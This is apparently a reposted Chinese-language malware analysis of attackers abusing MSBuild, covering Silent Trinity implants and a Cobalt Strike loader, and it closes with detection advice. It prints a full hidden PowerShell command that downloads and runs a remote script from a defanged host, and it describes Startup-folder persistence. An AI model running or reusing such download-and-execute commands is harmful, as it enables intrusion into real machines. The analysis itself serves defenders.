@MSBuild安全分析( 三 )
文章图片
文章图片
VBA Code使用文档的Subject属性启动下一阶段 。
文档主题属性包含执行PowerShell并获取并调用下一阶段的代码:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit -w hidden -Command iex(New-Object System.Net.WebClient).DownloadString('hxxp://apb[.]sh/helloworld[.]ps1')
Helloworld.ps1从另一个URLhxxp://apb[.]sh/msbuild[.]xml下载MSBuild配置并启动它 。最后 , Helloworld.ps1从hxxp://apb[.]sh/per[.]txt下载文件 , 并将其另存为a.bat到用户的\Start Menu\Programs\Startup\文件夹中 。A.bat确保用户注销系统后payload仍然存在 。
下载的MSBuild配置文件似乎是由Silent Trinity.NET开发后框架生成的 。它将.NET程序集payload存储为使用zlib压缩的文件 , 然后使用base64编码器进行编码 。
文章图片
文章图片
Silent Trinity是一个相对较新的框架 , 原始的Silent Trinity的植入物称为Naga , 具有解释以语言发送的命令的 。即使数据通过HTTP发送 , 植入物和C2服务器之间的通信也会被加密 。在这种情况下 , 渗透人员使用的是Naga的较旧版本 , 该版本不使用Boolang , 但会尝试加载IronPython(用于.NET框架的Python实现) 。
文章图片
文章图片
情况3:加密的COBALT STRIKE信标的URL
我们的最后一个案例研究具有不同的感染链 。它从一个网页开始 , 网页上存放着一家知名服装制造商G-III员工的所谓行为准则文件 。该文档是用VB脚本编写的HTML应用程序 , 它创建一个MSBuild配置文件并运行MSBuild 。
文章图片
文章图片
VB脚本HTA文件创建配置文件并调用MSBuild 。
MSBuild配置文件包含一个内联任务类 , 该类使用外部URL检索密钥以解密加密的嵌入式payload 。密钥存储在hxxp://makeonlineform[.]com/forms/228929[.]txt中 。payload是Cobalt Strike Powershell的加载程序 , 它最终将beacon 加载到内存中 。
文章图片
文章图片
加载Cobalt Strike beacon后 , HTA应用程序将浏览器导航到G-III的实际URL 。最后 , 将生成的MSBuild配置文件从计算机中删除 。
我们查看Threat Grid生成的图形中的进程树 , 会看到MSBuild.exe进程启动PowerShell的潜在可疑事件 。
文章图片
文章图片
结论
MSBuild是软件工程师构建.NET软件项目的必备工具 。但是 , 也为攻击者提供了方便 , 并可能提供一种绕过某些Windows安全机制的方法 。
最后 , 我们的研究表明 , MSBuild通常不被商品恶意软件使用 。观察到的大多数情况都具有利用后开发剂作为最终payload的变体 。建议防御者仔细监视进程执行的命令行参数 , 并特别调查其中MSBuild父进程是Web浏览器或Microsoft Office可执行文件的实例 。这种行为是高度可疑的 , 表明防御已被破坏 。设置基准后 , 可疑的MSBuild调用应易于显示且相对较少 , 因此不会增加团队的平均工作量 。
推荐阅读
- 科技资深分析@极限高空挑战!这家国产巨头玩嗨了!居然体验高空开伞开箱?
- 『微软』微软win10推出04更新,提升安全性和修复局域网IP重置
- 每日经济新闻咨询@联邦学习成人工智能新贵 腾讯安全:技术服务能力才是重点
- 【索尼】SONY PS5 售价即将发布 针对售价的全面分析
- 高盛分析师@高盛分析师:苹果iPhone 12可能推迟到11月发布
- #麻辣西斯FFn1#关于华为手机混合使用不同供应商屏幕的原因分析
- 「」关于华为手机混合使用不同供应商屏幕的原因分析
- 『』一汽集团成立人工智能公司,2019人工智能应用场景、发展趋势分析
- 『搜狐新闻』SONY PS5 售价即将发布 针对售价的全面分析
- []学会这个最基础的统计学知识,数据分析专业度提升一大截